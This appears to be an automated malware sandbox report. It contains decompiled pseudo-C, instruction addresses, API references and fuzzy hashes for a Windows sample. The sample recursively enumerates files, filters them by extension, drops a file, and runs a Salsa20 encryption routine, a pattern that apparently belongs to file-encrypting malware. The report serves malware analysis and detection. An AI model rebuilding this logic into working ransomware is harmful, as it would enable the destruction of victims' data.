									_t423 = _t423 + 2;
								} while (_t280 != 0);
								_t425 = _t423 - _t491 >> 1;
								L42:
								_push(_t425);
								E00415C10(_t411,  &_v40, _t481, _t491, _t468);
								_t491 = E00413520( &_v64,  &_v144, 0, _v48 - _v24);
								if( &_v64 != _t491) {
									if(_v44 >= 8) {
										L00422587(_v64);
										_t497 = _t497 + 4;
									}
									_v44 = 7;
									_v48 = 0;
									_v64 = 0;
									if(_t491[5] >= 8) {
										_v64 =  *_t491;
										 *_t491 = 0;
									} else {
										_t372 = _t491[4] + 1;
										if(_t491[4] + 1 != 0) {
											E004205A0( &_v64, _t491, _t372 + _t372);
											_t497 = _t497 + 0xc;
										}
									}
									_v48 = _t491[4];
									_v44 = _t491[5];
									_t491[5] = 7;
									_t491[4] = 0;
									 *_t491 = 0;
								}
								if(_v124 >= 8) {
									L00422587(_v144);
									_t497 = _t497 + 4;
								}
								continue;
							}
							_t425 = 0;
							goto L42;
						}
						if(_t481 > 3) {
							L73:
							if(_v20 >= 8) {
								L00422587(_v40);
								_t497 = _t497 + 4;
							}
							_v8 = 3;
							_v20 = 7;
							_v24 = 0;
							_v40 = 0;
							if(_v44 >= 8) {
								L00422587(_v64);
								_t497 = _t497 + 4;
							}
							_t288 = E00417140( &_v144,  &_a4, "*");
							_t498 = _t497 + 4;
							if(_t288[0xa] >= 8) {
								_t288 =  *_t288;
							}
							_t482 = FindFirstFileW(_t288,  &_v740);
							if(_v124 >= 8) {
								L00422587(_v144);
								_t498 = _t498 + 4;
							}
							_v124 = 7;
							_t492 = 0;
							_v128 = 0;
							_v144 = 0;
							if(_t482 == 0xffffffff) {
								L119:
								if(_v76 >= 8) {
									L00422587(_v96);
									_t498 = _t498 + 4;
								}
								_t291 = 0;
								_v76 = 7;
								_v80 = 0;
								_v96 = 0;
								goto L122;
							} else {
								_t413 = _a28;
								do {
									_t431 = ".";
									_t293 =  &(_v740.cFileName);
									while(1) {
										_t470 =  *_t293;
										if(_t470 !=  *_t431) {
											break;
										}
										if(_t470 == 0) {
											L88:
											_t294 = 0;
											L90:
											if(_t294 == 0) {
												goto L117;
											}
											_t432 = L"..";
											_t298 =  &(_v740.cFileName);
											while(1) {
												_t471 =  *_t298;
												if(_t471 !=  *_t432) {
													break;
												}
												if(_t471 == 0) {
													L96:
													_t299 = 0;
													L98:
													if(_t299 == 0) {
														goto L117;
													}
													if((_v740.dwFileAttributes & 0x00000010) == 0) {
														_t492 = _t492 + 1;
														if(_t492 >= 0x400) {
															_t492 = 0;
															E00411AB0();
														}
														_v20 = 7;
														_push(0xffffffff);
														_push(0);
														_v40 = 0;
														_v24 = 0;
														E00414690(_t413,  &_v40,  &_a4);
														_v8 = 9;
														if(_v740.cFileName != 0) {
															_t434 =  &(_v740.cFileName);
															_t231 = _t434 + 2; // 0x2
															_t472 = _t231;
															do {
																_t303 =  *_t434;
																_t434 = _t434 + 2;
															} while (_t303 != 0);
															_t436 = _t434 - _t472 >> 1;
															goto L108;
														} else {
															_t436 = 0;
															L108:
															_push(_t436);
															E00415AE0(_t413,  &_v40, _t482, _t492,  &(_v740.cFileName));
															_t307 =  >=  ? _v40 :  &_v40;
															_t308 = PathFindExtensionW( >=  ? _v40 :  &_v40);
															_t439 = _v72 + 0x868;
															if( *((intOrPtr*)(_t439 + 0x14)) >= 8) {
																_t439 =  *_t439;
															}
															_push(_t308);
															_push(_t439);
															_t309 = E00421C02(_t439);
															_t498 = _t498 + 8;
															if(_t309 == 0) {
																_t441 = _v72 + 0x820;
																if( *((intOrPtr*)(_t441 + 0x14)) >= 8) {
																	_t441 =  *_t441;
																}
																_push(_t441);
																_t312 =  >=  ? _v40 :  &_v40;
																_push( >=  ? _v40 :  &_v40);
																_t313 = E00421C02(_t441);
																_t498 = _t498 + 8;
																if(_t313 == 0) {
																	E004136C0(_t413,  &_v40);
																}
															}
															L115:
															_v8 = 3;
															if(_v20 >= 8) {
																L00422587(_v40);
																_t498 = _t498 + 4;
															}
															goto L117;
														}
													}
													E00417140( &_v40,  &_a4,  &(_v740.cFileName));
													_push(1);
													_v8 = 8;
													E00415AE0(_t413,  &_v40, _t482, _t492, "\\");
													_push(_t413);
													_t501 = _t498 + 4 - 0x18;
													_t445 = _t501;
													_push(0xffffffff);
													 *(_t445 + 0x14) = 7;
													 *(_t445 + 0x10) = 0;
													_push(0);
													 *_t445 = 0;
													E00414690(_t413, _t445,  &_v40);
													E00410160(_v72, _v148);
													_t498 = _t501 + 0x1c;
													goto L115;
												}
												_t475 =  *((intOrPtr*)(_t298 + 2));
												_t209 =  &(_t432[2]); // 0x2e
												if(_t475 !=  *_t209) {
													break;
												}
												_t298 = _t298 + 4;
												_t432 =  &(_t432[4]);
												if(_t475 != 0) {
													continue;
												}
												goto L96;
											}
											asm("sbb eax, eax");
											_t299 = _t298 | 0x00000001;
											goto L98;
										}
										_t476 =  *((intOrPtr*)(_t293 + 2));
										_t206 =  &(_t431[2]); // 0x2e0000
										if(_t476 !=  *_t206) {
											break;
										}
										_t293 = _t293 + 4;
										_t431 =  &(_t431[4]);
										if(_t476 != 0) {
											continue;
										}
										goto L88;
									}
									asm("sbb eax, eax");
									_t294 = _t293 | 0x00000001;
									goto L90;
									L117:
								} while (FindNextFileW(_t482,  &_v740) != 0);
								FindClose(_t482);
								goto L119;
							}
						}
						_t502 = _t497 - 0x18;
						_t447 = _t502;
						_push(0xffffffff);
						 *(_t447 + 0x14) = 7;
						 *(_t447 + 0x10) = 0;
						_push(0);
						 *_t447 = 0;
						E00414690(_t411, _t447,  &_a4);
						_t330 = E0040F310(_t481, _t491);
						_t497 = _t502 + 0x18;
						if(_t330 != 0) {
							goto L73;
						}
						_push(0xffffffff);
						_push(0);
						E00414690(_t411,  &_v96,  &_a4);
						E00413A90(_t411,  &_v108, _t481, 0x400);
						_v8 = 6;
						_t450 = 0;
						_t334 = _v80;
						_t494 = _v108;
						if(_t334 == 0) {
							L57:
							_t414 = _v72;
							 *((short*)(_t494 + 2 + _t334 * 2)) = 0;
							_t335 = _t414 + 0x820;
							if(_t335[0xa] >= 8) {
								_t335 =  *_t335;
							}
							PathAppendW(_t494, _t335);
							_push(_v68);
							_v124 = 7;
							_v128 = 0;
							_v144 = 0;
							E00418400( &_v144, _t494, _v104);
							if(_v76 >= 8) {
								L00422587(_v96);
								_t497 = _t497 + 4;
							}
							_t453 = _v124;
							_v76 = 7;
							_v80 = 0;
							_v96 = 0;
							if(_t453 >= 8) {
								_v96 = _v144;
							} else {
								_t356 = _v128 + 1;
								if(_v128 + 1 != 0) {
									E004205A0( &_v96,  &_v144, _t356 + _t356);
									_t453 = _v124;
									_t497 = _t497 + 0xc;
								}
							}
							_v80 = _v128;
							_t343 =  >=  ? _v96 :  &_v96;
							_v76 = _t453;
							if(PathFileExistsW( >=  ? _v96 :  &_v96) == 0) {
								_t346 = E00420C62(_t414, _t468, _t481, 0x7d00);
								_t454 = _t414 + 0x838;
								_t503 = _t497 + 4;
								_t484 = _t346;
								if(_t454[0xa] >= 8) {
									_t454 =  *_t454;
								}
								lstrcpyW(_t484, _t454);
								_t348 = _t414 + 0x850;
								if( *((intOrPtr*)(_t414 + 0x864)) >= 8) {
									_t348 =  *_t348;
								}
								lstrcatW(_t484, _t348);
								_t504 = _t503 - 0x18;
								_t455 = _t504;
								_push(0xffffffff);
								 *(_t455 + 0x14) = 7;
								 *(_t455 + 0x10) = 0;
								_push(0);
								 *_t455 = 0;
								E00414690(_t414, _t455,  &_v96);
								E0040F0E0(_t484);
								E00420BED(_t484);
								_t497 = _t504 + 0x1c;
							}
							if(_t494 != 0) {
								L00422587(_t494);
								_t497 = _t497 + 4;
							}
							goto L73;
						}
						do {
							_t363 =  >=  ? _v96 :  &_v96;
							_t494[_t450] = ( >=  ? _v96 :  &_v96)[_t450];
							_t450 = _t450 + 1;
							_t334 = _v80;
						} while (_t450 < _t334);
						goto L57;
					}
					_t420 = 0;
					goto L24;
				} else {
					_t415 = 0;
					do {
						_v20 = 7;
						_push(0xffffffff);
						_push(0);
						_v40 = 0;
						_v24 = 0;
						E00414690(_t415,  &_v40,  &_a4);
						_v8 = 1;
						_push(0xffffffff);
						_push(0);
						_v120 = 0;
						_v100 = 7;
						_v104 = 0;
						E00414690(_t415,  &_v120,  *_v148 + _t415);
						_v8 = 2;
						_t477 = _v24;
						if(_t477 <= 1) {
							L10:
							if(_v100 >= 8) {
								L00422587(_v120);
								_t497 = _t497 + 4;
							}
							_v100 = 7;
							_v8 = 0;
							_v104 = 0;
							_v120 = 0;
							if(_v20 >= 8) {
								L00422587(_v40);
								_t497 = _t497 + 4;
							}
							goto L14;
						}
						_t460 = _v104;
						if(_t460 <= 1) {
							goto L10;
						} else {
							_t400 =  >=  ? _v40 :  &_v40;
							if( *((short*)(( >=  ? _v40 :  &_v40) + _t477 * 2 - 2)) != 0x5c) {
								_push(1);
								E00415AE0(_t415,  &_v40, _t480, _t490, "\\");
								_t460 = _v104;
							}
							_t495 = _v120;
							_t402 =  >=  ? _t495 :  &_v120;
							if( *((short*)(( >=  ? _t495 :  &_v120) + _t460 * 2 - 2)) != 0x5c) {
								_push(1);
								E00415AE0(_t415,  &_v120, _t480, _t495, "\\");
								_t495 = _v120;
							}
							_t462 =  >=  ? _t495 :  &_v120;
							_t404 =  >=  ? _v40 :  &_v40;
							_t405 = E00420235(_t415, _t480, _t495,  >=  ? _v40 :  &_v40,  >=  ? _t495 :  &_v120);
							_t498 = _t497 + 8;
							if(_t405 == 0) {
								if(_v100 >= 8) {
									L00422587(_v120);
									_t498 = _t498 + 4;
								}
								_t291 = 0;
								_v100 = 7;
								_v104 = 0;
								_v120 = 0;
								if(_v20 >= 8) {
									_t291 = L00422587(_v40);
									_t498 = _t498 + 4;
								}
								L122:
								if(_a24 >= 8) {
									_t291 = L00422587(_a4);
								}
								 *[fs:0x0] = _v16;
								return _t291;
							} else {
								_t490 = _v68;
								goto L10;
							}
						}
						L14:
						_t480 = _t480 + 1;
						_t415 = _t415 + 0x18;
					} while (_t480 < _t490);
					goto L15;
				}
			}

0x00410163
0x00410165
0x00410170
0x00410171
0x00410178
0x00410180
0x00410182
0x00410186
0x0041018c
0x00410193
0x004101a2
0x004101b1
0x004101b3
0x004101b6
0x004102e8
0x004102ea
0x004102f1
0x004102f8
0x00410302
0x00410306
0x00410308
0x0041030f
0x0041031b
0x0041031c
0x00410324
0x0041032b
0x00410330
0x0041033b
0x00410341
0x00410348
0x0041034a
0x00410353
0x0041035a
0x00410361
0x004103a6
0x004103a8
0x004103a8
0x004103b0
0x004103b0
0x004103b3
0x004103b6
0x004103bd
0x004103bf
0x004103bf
0x004103c4
0x004103c9
0x004103e5
0x004103ec
0x004103f2
0x004103f7
0x004103fc
0x004103fc
0x00410401
0x00410408
0x0041040f
0x00410417
0x00410433
0x00410436
0x00410419
0x0041041c
0x0041041d
0x00410427
0x0041042c
0x0041042c
0x0041041d
0x0041043f
0x00410445
0x0041044a
0x00410451
0x00410458
0x00410458
0x0041045f
0x00410467
0x0041046c
0x0041046c
0x0041046f
0x00410471
0x00410481
0x00410489
0x00410490
0x00410496
0x0041049c
0x0041049e
0x0041049e
0x004104a1
0x004104a1
0x004104a4
0x004104a7
0x004104ae
0x004104b0
0x004104b0
0x004104b5
0x004104d2
0x004104d9
0x004104df
0x004104e4
0x004104e9
0x004104e9
0x004104ee
0x004104f5
0x004104fc
0x00410504
0x00410520
0x00410523
0x00410506
0x00410509
0x0041050a
0x00410514
0x00410519
0x00410519
0x0041050a
0x0041052c
0x00410532
0x00410537
0x0041053e
0x00410545
0x00410545
0x0041054c
0x00410558
0x0041055d
0x0041055d
0x00000000
0x0041054c
0x00410498
0x00000000
0x00410498
0x00410568
0x00410728
0x0041072c
0x00410731
0x00410736
0x00410736
0x0041073b
0x00410743
0x0041074a
0x00410751
0x00410755
0x0041075a
0x0041075f
0x0041075f
0x00410770
0x00410775
0x0041077c
0x0041077e
0x0041077e
0x00410792
0x00410794
0x0041079c
0x004107a1
0x004107a1
0x004107a6
0x004107ad
0x004107af
0x004107b6
0x004107c0
0x004109c7
0x004109cb
0x004109d0
0x004109d5
0x004109d5
0x004109d8
0x004109da
0x004109e1
0x004109e8
0x00000000
0x004107c6
0x004107c6
0x004107d0
0x004107d0
0x004107d5
0x004107e0
0x004107e0
0x004107e6
0x00000000
0x00000000
0x004107eb
0x00410802
0x00410802
0x0041080b
0x0041080d
0x00000000
0x00000000
0x00410813
0x00410818
0x00410820
0x00410820
0x00410826
0x00000000
0x00000000
0x0041082b
0x00410842
0x00410842
0x0041084b
0x0041084d
0x00000000
0x00000000
0x0041085a
0x004108bf
0x004108c6
0x004108c8
0x004108ca
0x004108ca
0x004108d1
0x004108d8
0x004108da
0x004108db
0x004108e5
0x004108ed
0x004108f2
0x004108fe
0x00410904
0x0041090a
0x0041090a
0x00410910
0x00410910
0x00410913
0x00410916
0x0041091d
0x00000000
0x00410900
0x00410900
0x0041091f
0x0041091f
0x0041092a
0x00410936
0x0041093b
0x00410944
0x0041094e
0x00410950
0x00410950
0x00410952
0x00410953
0x00410954
0x00410959
0x0041095e
0x00410963
0x0041096d
0x0041096f
0x0041096f
0x00410978
0x00410979
0x0041097d
0x0041097e
0x00410983
0x00410988
0x00410990
0x00410990
0x00410988
0x00410995
0x00410995
0x0041099d
0x004109a2
0x004109a7
0x004109a7
0x00000000
0x0041099d
0x004108fe
0x00410869
0x00410871
0x0041087b
0x0041087f
0x00410884
0x00410885
0x0041088a
0x0041088c
0x0041088e
0x00410895
0x0041089c
0x0041089d
0x004108a4
0x004108b2
0x004108b7
0x00000000
0x004108b7
0x0041082d
0x00410831
0x00410835
0x00000000
0x00000000
0x00410837
0x0041083a
0x00410840
0x00000000
0x00000000
0x00000000
0x00410840
0x00410846
0x00410848
0x00000000
0x00410848
0x004107ed
0x004107f1
0x004107f5
0x00000000
0x00000000
0x004107f7
0x004107fa
0x00410800
0x00000000
0x00000000
0x00000000
0x00410800
0x00410806
0x00410808
0x00000000
0x004109aa
0x004109b8
0x004109c1
0x00000000
0x004109c1
0x004107c0
0x0041056e
0x00410573
0x00410575
0x00410577
0x0041057e
0x00410585
0x00410586
0x0041058d
0x00410592
0x00410597
0x0041059c
0x00000000
0x00000000
0x004105a2
0x004105a4
0x004105ad
0x004105ba
0x004105bf
0x004105c3
0x004105c5
0x004105c8
0x004105cd
0x004105eb
0x004105eb
0x004105f0
0x004105f5
0x004105ff
0x00410601
0x00410601
0x00410605
0x0041060b
0x00410610
0x00410620
0x00410628
0x0041062f
0x00410638
0x0041063d
0x00410642
0x00410642
0x00410645
0x0041064a
0x00410651
0x00410658
0x0041065f
0x00410688
0x00410661
0x00410664
0x00410665
0x00410675
0x0041067a
0x0041067d
0x0041067d
0x00410665
0x00410691
0x00410697
0x0041069c
0x004106a7
0x004106ae
0x004106b3
0x004106b9
0x004106c0
0x004106c2
0x004106c4
0x004106c4
0x004106c8
0x004106d5
0x004106db
0x004106dd
0x004106dd
0x004106e1
0x004106e7
0x004106ec
0x004106ee
0x004106f0
0x004106f7
0x004106fe
0x004106ff
0x00410706
0x0041070d
0x00410713
0x00410718
0x00410718
0x0041071d
0x00410720
0x00410725
0x00410725
0x00000000
0x0041071d
0x004105d0
0x004105d7
0x004105df
0x004105e3
0x004105e4
0x004105e7
0x00000000
0x004105d0
0x00410363
0x00000000
0x004101bc
0x004101bc
0x004101c0
0x004101c2
0x004101c9
0x004101cb
0x004101cc
0x004101d6
0x004101de
0x004101eb
0x004101ef
0x004101f1
0x004101f6
0x004101fe
0x00410205
0x0041020c
0x00410211
0x00410215
0x0041021b
0x004102a3
0x004102a7
0x004102ac
0x004102b1
0x004102b1
0x004102b6
0x004102bd
0x004102c4
0x004102cb
0x004102cf
0x004102d4
0x004102d9
0x004102d9
0x00000000
0x004102cf
0x00410221
0x00410227
0x00000000
0x00410229
0x00410230
0x0041023a
0x0041023c
0x00410246
0x0041024b
0x0041024b
0x00410254
0x0041025a
0x00410263
0x00410265
0x0041026f
0x00410277
0x00410277
0x00410283
0x0041028b
0x00410290
0x00410295
0x0041029a
0x0041036b
0x00410370
0x00410375
0x00410375
0x00410378
0x0041037a
0x00410385
0x0041038c
0x00410390
0x00410399
0x0041039e
0x0041039e
0x004109ec
0x004109f0
0x004109f5
0x004109fa
0x00410a02
0x00410a0d
0x004102a0
0x004102a0
0x00000000
0x004102a0
0x0041029a
0x004102dc
0x004102dc
0x004102dd
0x004102e0
0x00000000
0x004101c0

APIs

Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411ACA
Part of subcall function 00411AB0: DispatchMessageW.USER32 ref: 00411AE0
Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411AEE

PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00410346
_memmove.LIBCMT ref: 00410427
PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0041048E
_memmove.LIBCMT ref: 00410514

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: Message$FileFindNamePathPeek_memmove$Dispatch
String ID:
API String ID: 273148273-0
Opcode ID: 37d729970138fa20ecb10f3a8d2967014a2a5ca4c4729fe75e2d0ef93e9e641a
Instruction ID: 4d52a43d2e6eeb98f1fe08e229a92f838bd03635929547cf71b8ba18611ce854
Opcode Fuzzy Hash: 37d729970138fa20ecb10f3a8d2967014a2a5ca4c4729fe75e2d0ef93e9e641a
Instruction Fuzzy Hash: EF429F70D00208DBDF14DFA4C985BDEB7F5BF04308F20456EE415A7291E7B9AA85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004382A2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004382A2(short _a4, intOrPtr _a8) {
				short _t13;
				short _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E00437413(_t28, ?str?) != 0) {
					if(E00437413(_t28, ?str?) != 0) {
						return E00423C92(_t28);
					}
					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t13 = _a4;
				if(_t13 == 0) {
					return GetACP();
				}
				return _t13;
			}

0x004382a6
0x004382ab
0x004382d3
0x00000000
0x004382fc
0x004382ee
0x0043831a
0x00000000
0x0043831a
0x00000000
0x004382f0
0x00438318
0x00000000
0x00000000
0x0043831e
0x00438323
0x00438327
0x00438327
0x004382f5

APIs

_wcscmp.LIBCMT ref: 004382B9
_wcscmp.LIBCMT ref: 004382CA
GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310

Strings

OCP, xrefs: 004382C4
ACP, xrefs: 004382B3

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: InfoLocale_wcscmp
String ID: ACP$OCP
API String ID: 1351282208-711371036
Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C

Uniqueness

Uniqueness Score: -1.00%

Function 0040C070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280
COMMONCrypto

Download Yara Rule

C-Code - Quality: 55%

			E0040C070(intOrPtr __ecx, void* __edx, void* __esi, signed int* _a4, signed char* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				intOrPtr _v128;
				char _v190;
				void* __ebx;
				void* __edi;
				intOrPtr _t174;
				signed int _t186;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t229;
				signed int _t235;
				signed int _t237;
				void* _t244;
				intOrPtr _t248;
				signed char _t250;
				signed int _t252;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t258;
				signed int _t260;
				signed int _t262;
				signed int _t264;
				signed int _t266;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int* _t272;
				signed int _t276;
				signed int _t277;
				intOrPtr _t284;
				void* _t285;
				void* _t286;
				signed int _t288;
				signed int _t289;
				unsigned int _t290;
				intOrPtr _t292;
				signed char* _t293;
				signed int _t294;
				signed int _t295;
				signed char* _t296;
				void* _t297;
				signed int _t298;
				signed int _t299;
				char* _t301;
				void* _t303;
				void* _t305;
				void* _t313;

				_t297 = __esi;
				_t286 = __edx;
				_t251 = _a4;
				_t174 = __ecx;
				_v56 = __ecx;
				_t293 = _a8;
				if(_a4 == 0) {
					L2:
					_push(0x7a);
					E004211DD(_t251, _t286, _t293, _t297, _t309, L"input != nullptr && output != nullptr", L"e:\\doc\\my work (c++)\\_git\\encryption\\encryptionwinapi\\Salsa20.inl");
					_t174 = _v56;
				} else {
					_t309 = _t293;
					if(_t293 == 0) {
						goto L2;
					}
				}
				if(_a12 != 0) {
					_v128 = _t174 -  &_v190;
					_push(_t297);
					do {
						asm("movdqu xmm0, [eax]");
						_v60 = 0xa;
						asm("movdqu [ebp-0x78], xmm0");
						asm("movdqu xmm0, [eax+0x10]");
						asm("movdqu [ebp-0x68], xmm0");
						asm("movdqu xmm0, [eax+0x20]");
						asm("movdqu [ebp-0x58], xmm0");
						_t294 = _v80;
						asm("movdqu xmm0, [eax+0x30]");
						_v8 = _v84;
						_v36 = _v88;
						_v16 = _v92;
						_v48 = _v96;
						_v44 = _v100;
						_v32 = _v104;
						_v12 = _v108;
						_v40 = _v112;
						asm("movdqu [ebp-0x48], xmm0");
						_t252 = _v76;
						_t276 = _v64;
						_t288 = _v68;
						_t298 = _v72;
						_v28 = _v116;
						_v24 = _v120;
						_t186 = _v124;
						_v52 = _t252;
						_v20 = _t186;
						do {
							asm("rol eax, 0x7");
							_v12 = _v12 ^ _t186 + _t252;
							asm("rol eax, 0x9");
							_v16 = _v16 ^ _v12 + _v20;
							asm("rol eax, 0xd");
							_t254 = _v52 ^ _v16 + _v12;
							_v52 = _t254;
							asm("ror eax, 0xe");
							_v20 = _v20 ^ _v16 + _t254;
							asm("rol eax, 0x7");
							_v36 = _v36 ^ _v24 + _v32;
							asm("rol eax, 0x9");
							_t299 = _t298 ^ _v36 + _v32;
							_t255 = _v44;
							asm("rol eax, 0xd");
							_v24 = _v24 ^ _v36 + _t299;
							asm("ror eax, 0xe");
							_v32 = _v32 ^ _v24 + _t299;
							asm("rol eax, 0x7");
							_t289 = _t288 ^ _v8 + _t255;
							asm("rol eax, 0x9");
							_v28 = _v28 ^ _v8 + _t289;
							asm("rol eax, 0xd");
							_t256 = _t255 ^ _v28 + _t289;
							_v44 = _t256;
							asm("ror eax, 0xe");
							_v8 = _v8 ^ _v28 + _t256;
							asm("rol eax, 0x7");
							_t258 = _v40 ^ _t294 + _t276;
							_v40 = _t258;
							asm("rol eax, 0x9");
							_t260 = _v48 ^ _t258 + _t276;
							_v48 = _t260;
							asm("rol eax, 0xd");
							_t295 = _t294 ^ _v40 + _t260;
							asm("ror eax, 0xe");
							_t277 = _t276 ^ _t260 + _t295;
							asm("rol eax, 0x7");
							_v24 = _v24 ^ _v20 + _v40;
							_t217 = _v24;
							_v120 = _t217;
							asm("rol eax, 0x9");
							_v28 = _v28 ^ _t217 + _v20;
							_t219 = _v28;
							_v116 = _t219;
							asm("rol eax, 0xd");
							_t262 = _v40 ^ _t219 + _v24;
							_v40 = _t262;
							asm("ror eax, 0xe");
							_v112 = _t262;
							_t264 = _v20 ^ _v28 + _t262;
							asm("rol eax, 0x7");
							_v44 = _v44 ^ _v32 + _v12;
							_t225 = _v44;
							_v100 = _t225;
							asm("rol eax, 0x9");
							_v20 = _t264;
							_v124 = _t264;
							_t266 = _v48 ^ _t225 + _v32;
							_v48 = _t266;
							asm("rol eax, 0xd");
							_v12 = _v12 ^ _v44 + _t266;
							_t229 = _v12;
							_v108 = _t229;
							asm("ror eax, 0xe");
							_v96 = _t266;
							_t268 = _v32 ^ _t229 + _t266;
							_v32 = _t268;
							_v104 = _t268;
							_t269 = _v36;
							asm("rol eax, 0x7");
							_t294 = _t295 ^ _v8 + _t269;
							asm("rol eax, 0x9");
							_v16 = _v16 ^ _v8 + _t294;
							_t235 = _v16;
							_v92 = _t235;
							asm("rol eax, 0xd");
							_t270 = _t269 ^ _t235 + _t294;
							_t237 = _t270;
							_v36 = _t270;
							_v88 = _t237;
							asm("ror eax, 0xe");
							_v8 = _v8 ^ _t237 + _v16;
							_v84 = _v8;
							asm("rol eax, 0x7");
							_t252 = _v52 ^ _t277 + _t289;
							_v52 = _t252;
							_v76 = _t252;
							asm("rol eax, 0x9");
							_t298 = _t299 ^ _t277 + _t252;
							asm("rol eax, 0xd");
							_t288 = _t289 ^ _t298 + _t252;
							asm("ror eax, 0xe");
							_t276 = _t277 ^ _t288 + _t298;
							_t138 =  &_v60;
							 *_t138 = _v60 - 1;
							_t186 = _v20;
						} while ( *_t138 != 0);
						_t272 = _a4;
						_t244 = 0;
						_v80 = _t294;
						_t296 = _a8;
						_v64 = _t276;
						_v68 = _t288;
						_v72 = _t298;
						do {
							_t301 =  &_v190 + _t244;
							 *(_t305 + _t244 - 0x78) =  *(_t305 + _t244 - 0x78) +  *((intOrPtr*)(_t301 + _v128));
							_t290 =  *(_t305 + _t244 - 0x78);
							 *((char*)(_t301 - 1)) = _t290 >> 8;
							 *(_t305 + _t244 - 0xbc) = _t290;
							_t244 = _t244 + 4;
							 *_t301 = _t290 >> 0x10;
							 *((char*)(_t301 + 1)) = _t290 >> 0x18;
							_t313 = _t244 - 0x40;
						} while (_t313 < 0);
						_t284 = _v56;
						_t292 = _a12;
						 *((intOrPtr*)(_t284 + 0x20)) =  *((intOrPtr*)(_t284 + 0x20)) + 1;
						 *((intOrPtr*)(_t284 + 0x24)) =  *((intOrPtr*)(_t284 + 0x24)) + (0 | _t313 == 0x00000000);
						_t303 =  >=  ? 0x40 : _t292;
						_t285 = 0;
						if(_t303 == 0) {
							goto L12;
						} else {
							goto L10;
						}
						do {
							L10:
							_t292 = _t292 - 1;
							_t250 =  *(_t305 + _t285 - 0xbc) ^  *_t272;
							_t285 = _t285 + 1;
							 *_t296 = _t250;
							_t272 =  &(_t272[0]);
							_t296 =  &(_t296[1]);
						} while (_t285 < _t303);
						_a12 = _t292;
						_a4 = _t272;
						_a8 = _t296;
						L12:
						_t248 = _v56;
					} while (_t292 != 0);
					return _t248;
				}
				return _t174;
			}

0x0040c070
0x0040c070
0x0040c07a
0x0040c07d
0x0040c07f
0x0040c083
0x0040c088
0x0040c08e
0x0040c08e
0x0040c09a
0x0040c09f
0x0040c08a
0x0040c08a
0x0040c08c
0x00000000
0x00000000
0x0040c08c
0x0040c0a9
0x0040c0b9
0x0040c0bc
0x0040c0c0
0x0040c0c0
0x0040c0c4
0x0040c0cb
0x0040c0d0
0x0040c0d5
0x0040c0da
0x0040c0df
0x0040c0e4
0x0040c0e7
0x0040c0ef
0x0040c0f5
0x0040c0fb
0x0040c101
0x0040c107
0x0040c10d
0x0040c113
0x0040c119
0x0040c11f
0x0040c124
0x0040c127
0x0040c12a
0x0040c12d
0x0040c130
0x0040c136
0x0040c139
0x0040c13c
0x0040c13f
0x0040c142
0x0040c147
0x0040c14a
0x0040c153
0x0040c156
0x0040c15f
0x0040c162
0x0040c169
0x0040c16c
0x0040c16f
0x0040c178
0x0040c17b
0x0040c184
0x0040c187
0x0040c189
0x0040c191
0x0040c194
0x0040c19c
0x0040c19f
0x0040c1a7
0x0040c1aa
0x0040c1b1
0x0040c1b4
0x0040c1bc
0x0040c1bf
0x0040c1c6
0x0040c1cc
0x0040c1cf
0x0040c1d5
0x0040c1d8
0x0040c1da
0x0040c1e3
0x0040c1e6
0x0040c1ed
0x0040c1f0
0x0040c1f3
0x0040c1f8
0x0040c1fb
0x0040c203
0x0040c206
0x0040c209
0x0040c20c
0x0040c212
0x0040c215
0x0040c218
0x0040c21b
0x0040c221
0x0040c227
0x0040c22e
0x0040c231
0x0040c234
0x0040c23a
0x0040c242
0x0040c245
0x0040c248
0x0040c24b
0x0040c251
0x0040c254
0x0040c257
